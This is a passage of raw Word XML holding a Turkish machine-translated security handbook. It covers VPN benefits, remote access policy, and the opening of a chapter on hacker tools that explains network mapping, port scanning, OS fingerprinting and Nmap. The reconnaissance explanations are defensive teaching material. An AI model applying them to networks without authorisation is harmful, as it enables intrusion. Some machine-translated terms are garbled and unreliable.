    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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Güvenlik özellikleri, uygulamadan uygulamaya kadar farklılık gösterir, ancak çoğu güvenlik uzmanı VPN’lerin, verilerin şifrelenmesini, uzak kullanıcıların ve ana bilgisayarların güçlü şekilde doğrulanmasını ve özel ağ topolojisi hakkındaki bilgileri kamu ağındaki potansiyel saldırganlardan gizlemek veya gizlemek için mekanizmalar içerdiğini kabul eder. İletimdeki veriler, uzaktaki ve kurumsal sunucu arasında şifrelenerek veri gizliliğini ve bütünlüğünü korur. Dijital imzalar verilerin değiştirilmediğini doğrular. Uzaktaki kullanıcılar ve ana bilgisayarlar, bir kerelik şifre üreticileri ve dijital sertifikalar dahil olmak üzere güçlü kimlik doğrulama ve yetkilendirme mekanizmalarına tabidir. Bunlar, yalnızca uygun personelin kurumsal verilere erişebileceğini ve değiştirebileceğini garanti etmeye yardımcı olur. VPN'ler özel ağ adreslerinin genel ağ üzerinden yayılmasını önleyebilir, böylece potansiyel hedef makinelerin hizmet kesintiye uğramaya çalışan saldırganlardan gizlenmesini sağlayabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:noProof/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4311015" cy="3574415"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="39" name="Resim 39"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1015" cy="3574415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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EXHIBIT 9.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>Uzak kullanıcı VPN.</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Çoğu durumda, VPN teknolojisi İnternet üzerinden kullanılır, ancak VPN'lerin uzaktan erişim güvenliğini büyük ölçüde artırabileceği başka durumlar da vardır. Bir kuruluşun, iş ortağı konumunda veya müşteri sitesinde çalışan ve özel kampus ağına özel bir özel ağ devresi ile çalışan çalışanları olabilir. Kuruluş, kendi çalışanlarını ev ağlarına geri bağlamak için bir VPN uygulaması kullanmayı seçebilir ve hassas verileri iş ortağı ağında potansiyel olarak dinlenmeye karşı koruyabilir. Genel olarak, özel bir ağ ile örgütün idari veya yönetsel kontrolünün olmadığı bir kuruluş arasında bir bağlantı yapıldığında, VPN teknolojisi, verilerin bozulmasına ve sistem bütünlüğünün kaybına karşı değerli bir koruma sağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>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Düzgün bir şekilde uygulandığında, VPN'ler, en azından modem tabanlı erişim veya Frame Relay devreleri tarafından sağlananlara eşit granüler erişim kontrolü, hesap verebilirlik, öngörülebilirlik ve sağlamlık sağlar. Çoğu durumda, ağ güvenliği VPN ürünlerinin tasarımında dikkate alındığından, diğer uzaktan erişim teknolojilerinden daha yüksek düzeyde kontrol, denetim yeteneği ve esneklik sağlarlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pP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Uzaktan Erişim Sistemi Seçme</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>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Küçük, nispeten istikrarlı uzak kullanıcı grupları olan çalışanlar (çalışanlar veya çalışanlar için) olan kuruluşlar için VPN dağıtımının maliyeti, geleneksel uzaktan erişim yöntemlerine göre muhtemelen en düşük düzeyded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Bununla birlikte, dinamik kullanıcı toplulukları, karmaşık güvenlik politikaları ve genişleyen iş ortaklıkları için VPN teknolojisi yönetimi basitleştirebilir ve masrafları düşürebil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 VPN'ler seyahat eden çalışanların internet üzerinden şirket ağına erişmelerini sağlar. Varsa, uzak sitelerin mevcut İnternet bağlantılarını kullanarak ve bireysel erişim için yerel bir ISS'yi arayarak, pahalı uzun mesafe ücretlerinden kaçınılabili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 VPN'ler, müşteri sitelerinde, iş ortaklarında, otellerde ve güvenilmeyen diğer yerlerde çalışan çalışanların, özel ve özel bağlantılar üzerinden bir şirket ağına güvenle erişmelerini sağla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VPN'ler bir kuruluşun İnternet kullanan müşterilere müşteri desteği sunarken, müşterinin bilgisayar ağları için riskleri en aza indiri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Şirket sunucularına aynı anda birden fazla erişim düzeyinin desteklenmesini gerektiren karmaşık güvenlik ortamları için, VPN'ler idealdir. Çoğu VPN sistemi, geri duvarlar gibi çeşitli çevre güvenlik cihazlarıyla birlikte çalışır. VPN'ler, uzak kullanıcı popülasyonunun yönetimini basitleştiren birçok farklı merkezi kimlik doğrulama ve denetim sunucusunu kullanabilir. Kimlik doğrulama, yetkilendirme ve muhasebe (AAA) sunucuları ayrıca dahili sistemlere ayrıntılı erişim ataması sağlayabilir. Elbette, tüm bu esneklik dikkatli bir tasarım ve test gerektirir - ancak ilk öğrenme eğrisinin faydaları ve uygulama çabası çok büyük.</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lastRenderedPageBreak/>
        <w:t>VPN kullanmanın esnekliği ve maliyet avantajlarına rağmen, bazı durumlarda uygun olmayabilir; Örneğin:</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1. VPN'ler, mevcut İnternet bağlantılarını kullanarak maliyetleri düşürür. Uzak kullanıcılar, şirketler şubesi veya iş ortakları İnternete yeterli erişime sahip değilse, bu avantaj kaybedili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2. Gerekli uygulamalar SNA veya IPX gibi IP olmayan trafiğe dayanıyorsa, VPN'ler daha karmaşıktır. VPN istemcileri ve sunucuları IP olmayan protokolleri desteklemeli veya IP ağ geçitleri (çeviri aygıtları) tasarıma dahil edilmelidir. Bir ağda ağ geçitlerini sürdürmenin maliyeti ve karmaşıklığı, çeşitli IP dışı iletişimleri destekleyebilecek özel Frame Relay devreleri gibi alternatiflere karşı tartılmalıdı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3. Bazı endüstrilerde ve bazı kuruluşlarda, İnternet'in özel verilerin iletilmesi için kullanılması yasaktır. Örneğin, federal Sağlık Finansmanı İdaresi, İnternet'in hasta tarafından tanımlanabilen Medicare verilerinin aktarımı için kullanılmasına izin vermez (bu yazı sırasında). Bununla birlikte, özel bir ağ içinde bile, iletimde çok hassas veriler en iyi şekilde şifreleme VPN teknolojisi, özellikle de verilerin toplu olarak şifrelenmesi ve güçlü kimlik doğrulama / dijital sertifikalar kullanılarak korunabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152"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CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Uzaktan Erişim Politikası</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CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Resmi bir güvenlik politikası, uzaktan erişim sorununun çözümünde (ve tüm BT kaynaklarının günlük yönetiminde) tüm teknik, mali ve lojistik kararların hedeflerini ve temel kurallarını belirler. Bilgisayar güvenliği politikaları genellikle bir kuruluşun genel güvenlik çerçevesinin yalnızca bir alt grubunu oluşturur; diğer alanlar arasında çalışanların tespit mekanizmaları, hassas şirket lokasyonlarına ve kaynaklarına erişim, işe alma ve işten çıkarma prosedürleri vb.</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Çok az bilgi güvenliği yöneticisi veya denetçisi, kuruluşlarının iyi belgelenmiş bir politikaya sahip olduğuna inanmaktadır. Sözleşmeler, kaynaklar ve yönetici felsefesi öyle değişmektedir ki, güncel belgeleri korumak yasaklayıcı olabilir. Ancak en etkili güvenlik politikaları, şirket içindeki bilgi işlem kaynaklarının kullanımı ve kullanıcıların, operasyon personelinin ve bu bilgisayar sistemindeki yöneticilerin davranışları için beklentileri belirlemektedir. Sistem yöneticileri, yöneticileri ve kuruluş içindeki yasal ve düzenleyici otoriteler üzerinde fikir birliği üzerine kuruludur. En önemlisi, net bir yönetim desteğine sahipler ve çalışan nüfusu boyunca adil ve eşit bir şekilde zorlanıyorlar.</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Bir güvenlik politikasının anatomisi şirketten şirkete değişiklik gösterse de, genellikle birkaç bileşen içeri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Kesin olarak belirtilen bir amaç tartışılan güvenlik konusunu tanımlar ve dokümanın geri kalanını tanıtır.</w:t>
      </w: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Kapsam, politika için öngörülen izleyici kitlesinin yanı sıra denetim ve uygulama yetkisi zincirini belirtir.</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 Giriş politika ve kültürel, teknik ve ekonomik motivasyonları için arka plan bilgisi sağla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 Kullanım beklentileri tartışılan kaynağa ilişkin sorumlulukları ve ayrıcalıkları içerir. Bu bölüm kaynağın kurumsal mülkiyetine dair açık bir ifade içermelidir. </w:t>
      </w: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Son bileşen, sistem denetimini ve politikanın ihlal edilmesini kapsar: bir çalışanın kurumsal sistemlerde gizlilik hakkına, devam eden sistem izlemenin uygun şekilde kullanılmasına ve ihlal tespit edildiğinde disiplin cezasına ilişkin açık bir ifade.</w:t>
      </w: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Uzaktan erişim bağlamında, kapsamın hangi çalışanların şirket ağına uzaktan erişim için hak kazandığını ele alması gerekir. Yerel ağın “güvenilir” kullanıcısı olan herkese erişim sağlamak cazip gelebilir. Bununla birlikte, uygunsuz erişim riskini en aza indirmeye yardımcı olmak için durum bazında haklı gösterilmeli.</w:t>
      </w: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Güvenlik politikası ve uygulama ile ilgili diğer bir önemli konu ise devam eden, son kullanıcı eğitimidir. Uzak kullanıcılar, uzaktan bağlantının uygun kullanımıyla ilgili özel eğitim gerektirir; evlerde, otellerde ve müşteri yerlerindeki bilgisayar güvenliği risklerinin farkında olma; ve uzaktan erişim sistemindeki güvenlik ihlallerinin sonuçları.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>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10-  Hacker Araçları ve Teknikleri</w:t>
      </w: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p>
    <w:p w:rsidR="00E77DF4"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Ed Skoudis, CISSP</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Son başlıklar, en son hacker araçları ve tekniklerinin bir kurumun hassas bilgisine ve itibarına büyük zarar verebileceğini göstermektedir. Güçlü, kullanımı kolay ve yaygın olarak kullanılan hacker araçlarının yükselişiyle, güvenlik endüstrisindeki birçok kişi bugün hacklemenin altın çağı olduğunu gözlemledi. Bu bölümün amacı, günümüzde yaygın olarak kullanılan bilgisayar ve ağ güvenliğinden ödün vermek için kullanılan araçları tanımlamaktır. Ek olarak, açıklanan </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>her araç ve teknik için, bölüm her saldırı türüne karşı savunma konusunda pratik tavsiyeler suna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Bu araçlara ve kullanıcılarına uygulanan terminoloji, özellikle yeraltındaki bilgisayarda bazı tartışmalara neden olmuştur. Geleneksel olarak ve özellikle yeraltındaki bilgisayarda “hacker” terimi, işlerin nasıl yürüdüğünü ve bilgisayar sorunlarına yönelik yenilikçi yaklaşımlar geliştirmeye odaklanan bir kişiye atıfta bulunan iyi huylu bir kelimedir. Bu soylu bireyleri kötü bir saldırgandan ayırt etmek için, bu düşünce okulu kötü niyetli saldırganları “kraker” olarak nitelendiriyor. Bilgisayar korsanları dünyayı daha iyi bir yer haline getirmek için dışarı çıkarken, krakerler hasara ve kargaşaya neden olmak istiyor. Sıklıkla bu terimlerle ilgili karışıklığı önlemek için, bu bölümde, "sistem ve güvenlik yöneticisi" ve "güvenlik uygulayıcısı" terimleri, bu araçları çalıştırmak için meşru ve yetkili bir amacı olan bir kişiyi belirtmek için kullanılacaktır. “Saldırgan” terimi, sistemlere zarar vermek isteyen veya bu tür araçları çalıştırma yetkisi olmayan kişiler için kullanılacaktı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Bu bölümde açıklanan araçların çoğu çift kişiliklidir; iyilik veya kötülük için kullanılabilirler. Kötü niyetli kişiler tarafından kullanıldığında, araçlar motive olmuş bir saldırganın bir ağa erişmesine, bir uzlaşmanın gerçekleştiği gerçeğini gizlemesine, hatta hizmeti düşürmesine olanak sağlayarak büyük kullanıcı kitlelerini etkiliyor. Güvenlik uygulayıcıları tarafından uygun yetkilendirme ile kullanıldığında, saldırganlardan önce kırılganlıklara karşı “etik saldırı” testleri uygulayarak kendi kuruluşlarının güvenlik duruşlarını ölçmek için bazı araçlar kullanılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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Pr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Uyarı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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p>
    <w:p w:rsidR="00E77DF4"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Bu bölümün amacı, günümüzde kullanılan çeşitli yeraltı araçlarını açıklamak ve her bir araç türünü ele almak için savunma tekniklerini tartışmaktır. Bu bölüm saldırıları teşvik etmek için tasarlanmamıştır. Ayrıca, aşağıda açıklanan araçlar yalnızca açıklama amaçlıdır ve bu bölümde bahsedilen bir onay değildir. Okuyucular bu araçları denemeye mecbur kalırlarsa, bu araçların sık sık virüslere veya ağlara ve bilgi sistemlerine zarar verebilecek diğer belgelenmemiş özelliklere sahip olduğunu fark ederek kendi riskleri dahilinde yapmaları gerekir. Bu araçları kullanmak isteyen meraklı okuyucular, kaynak kodunu gözden geçirmeli veya hassas üretim sistemlerini korumak için araçları en azından ayrı, ha</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>va boşluklu bir ağa kurmalıdı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Bilgisayar Yeraltındaki Genel Eğilimler</w:t>
      </w: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Yeraltındaki bilgisayardaki en iyi ve en parlak beyinler, araştırma araştırması yapmak ve günlük olarak yeni güvenlik açıkları ve güçlü, yeni saldırılar bulmaktır. Süper akıllı saldırganlar ve güvenlik uygulayıcıları tarafından yapılan fikirler ve derin araştırmalar yazılım programlarında ve komut dosyalarında uygulanmaktadır. Belirli bir işletim sisteminin kendi şifre şemasını nasıl uyguladığı hakkında aylarca süren araştırmalar kodda işleniyor, bu nedenle ipucu olmayan bir saldırgan (genellikle “script kiddie” olarak adlandırılan) bile yalnızca bir tıkla ve tıkla, çok karmaşık bir saldırı gerçekleştirebiliyor. Senaryo kiddie, araçların gerçek işlevini ve nüanslarını anlamıyor olsa da, saldırının çoğu otomatikleştirildi. Bu ortamda, güvenlik uzmanları, rakiplerinin yeteneklerini hafife almamaya özen göstermelidir. Genellikle, güvenlik ve sistem yöneticileri potansiyel saldırganlarını, interneti gezen basit çocuklar için basit bir av arayanlar olarak düşünürler. Bu değerlendirme bazen doğru olsa da, iki ana kaygısını maskelemektedir. İlk olarak, bu genç çocuklardan bazıları inanılmaz derecede zekidir ve bir ağa zarar verebilir. İkincisi, saldırganlar sadece çocuklar olmayabilir; organize suç, teröristler ve hatta yabancı hükümetler, siber saldırılara sponsorluk yapmakta kaldılar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Yüksek Kaliteli Aletlerin Geniş Dağılımı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pP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Bilişim yeraltındaki bir başka eğilim, araçların yaygın şekilde dağılmasını içerir. Geçmişte (on yıl önce), güçlü saldırı araçları yeraltındaki bilgisayardaki seçkin bir grup elitle sınırlıydı. Bugün, yüzlerce Web sitesi, gezegen üzerindeki her saldırgan (ve güvenlik uygulayıcısı) için araç paylaşımına ayrılmıştır. SSS, her türlü işletim sistemine nasıl girileceğini açıklayan bir programdır. Bu genel eğilimler akıllı saldırganların sistemlerimizin altını oymaya yönelik ayrıntılı bilgi sahibi olduğu bir dünyada birleşirken, o kadar akıllı olmayan saldırganlar gittikçe daha fazla büyüyor. Bu artan tehdidi ele almak için sistem yöneticileri ve güvenlik uygulayıcıları bu araçları ve bunlara karşı nasıl korunacaklarını anlamalıdır. Bu bölümün geri kalanında, günümüzde yaygın kullanımda olan bu çok güçlü araçların birçoğu, bir kişinin ağını her saldırı türünden korumak için pratik savunma ipuçları ile birlikte açıklanmaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Ağ Haritalama ve Port Tarama</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pP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Bir TCP / IP ağında (İnternet veya şirket intraneti gibi) bir saldırı başlatırken, saldırganın hangi adreslerin etkin olduğunu, ağ topolojisinin nasıl oluşturulduğunu ve hangi hizmetlerin kullanılabilir olduğunu bilmesi gerekir. Bir ağ eşleyici, hedef ağa bağlı sistemleri tanımlar. Bir ağ adres aralığı göz önüne alındığında, ağ eşleyici hangi adreslerin makinelere sahip olduğunu belirlemek için olası her adrese paket gönderir. Bir sunucuya basit bir İnternet Kontrol Mesajı Protokolü (ICMP) paketi göndererek (bir "ping"), eşleme aracı bir sunucunun ağa bağlı olup olmadığını keşfedebilir. Gelen pingleri engelleyen ağlar için, bugün mevcut olan haritalama araçlarının çoğu, bir sunucuya bağlantı kurmayı denemek için tek bir SYN paketi gönderebilir. Bir sunucu dinliyorsa, port açıksa SYN paketi bir ACK'yı ve port kapalı ise potansiyel olarak bir “Port Ulaşılamaz” mesajını tetikler. Bağlantı noktasının açık veya kapalı olmasına bakılmaksızın, yanıt, adresin makine dinlemesine sahip olduğunu gösterir. Bu adres listesiyle bir saldırgan saldırıyı durdurabilir ve bu dinleme sistemlerine odaklanabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pP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Bir port tarayıcı sistemdeki açık portları tanımlar. Bazıları sistemde açık olan, çoğu kapalı olan 65,535 TCP ve 65,535 UDP bağlantı noktası vardır. Ortak hizmetler belirli bağlantı noktalarıyla ilişkilendirilir. Örneğin, TCP Bağlantı Noktası 80, en çok Web sunucuları tarafından kullanılır, TCP Bağlantı Noktası 23, Telnet daemons tarafından kullanılır ve TCP Bağlantı Noktası 25, Internet üzerinden sunucudan sunucuya posta alışverişinde kullanılır. Bir port taraması gerçekleştirerek, bir saldırgan her porta paket gönderir. Temel olarak, portlar bir makinedeki kapılar gibidir. Mevcut binlerce kapıdan birinde ortak servisler dinliyor olacak. Bağlantı noktası tarama aracı, saldırganın kimin cevap verdiğini görmek için bu kapıların her birini vurmasına olanak tanır. Bazı tarama araçları, TCP-baskı özellikleri içerir. İnternet Mühendisliği Görev Gücü (IETF), çeşitli Açıklama İsteklerinde (RFC'ler) TCP ve IP'yi dikkatli bir şekilde belirlese de, tüm paket seçeneklerinin kendisiyle ilişkilendirilmiş standartları yoktur. Sistemlerin yasadışı paket biçimlerine nasıl yanıt vermesi gerektiği konusunda standartlar olmadan, farklı üreticilerin TCP / IP yığınları yasadışı paketlere farklı tepkiler verir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Saldırgan, çeşitli yasadışı paket seçeneklerinin kombinasyonlarını (örneğin bir RST paketiyle bağlantı başlatmak veya diğer garip ve yasadışı TCP kod bitlerini birleştirmek gibi) göndererek, hedef makinede hangi işletim sisteminin çalıştığını belirleyebilir. Örneğin, bir TCP baskı baskısı taraması gerçekleştirerek bir saldırgan, bir makinenin Cisco IOS, Sun Solaris veya Microsoft Windows 2000 kullanıp kullanmadığını belirleyebilir. Bazı durumlarda, bu sürüm kullanılarak belirli bir sürüm veya hizmet paketi seviyesi bile belirlenebilir. Bir saldırgan, ağ haritalama araçlarını ve port tarayıcılarını kullandıktan sonra, hedef ağdaki hangi adreslerin dinleme makinelerine sahip olduğunu, bu makinelerde hangi portların açık olduğunu (ve dolayısıyla hangi servislerin çalıştığını) ve hangi işletim sistemi platformlarının kullanıldığını bilir. Bu bilgi hazinesi, saldırının gerçekleşmesinde saldırganın yararınadır. Bu verilerle, saldırgan erişim sağlamaya çalışmak için belirli hizmetler ve sistemlerdeki güvenlik açıklarını arayabilir. Fyodor tarafından yazılmış Nmap, günümüzde mevcut olan en kapsamlı özellikli haritalama ve tarama araçlarından biridir. Ağ haritalamayı, port taramayı ve TCP yazdırmayı destekleyen Nmap, http://www.insecure adresinde bulunabilir. org / nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
